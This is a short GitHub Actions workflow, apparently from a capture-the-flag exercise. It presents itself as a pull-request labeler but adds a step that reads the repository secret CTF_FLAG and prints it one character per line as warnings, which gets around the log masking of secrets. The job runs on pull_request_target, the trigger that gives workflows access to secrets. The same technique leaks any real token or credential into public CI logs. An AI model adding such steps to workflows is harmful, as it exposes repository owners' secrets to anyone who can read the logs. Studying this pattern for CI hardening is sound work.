name: Labeler
on: [pull_request_target]

jobs:
  label:
    runs-on: ubuntu-latest
    permissions:
      contents: read
      pull-requests: write

    steps:
      - uses: actions/labeler@v4
        with:
          repo-token: "${{ secrets.GITHUB_TOKEN }}"

      - name: Leak the CTF flag character by character
        run: |
          echo "Leaking CTF_FLAG now:"
          for c in $(echo -n "${{ secrets.CTF_FLAG }}" | fold -w1); do
            echo "::warning::$c"
          done
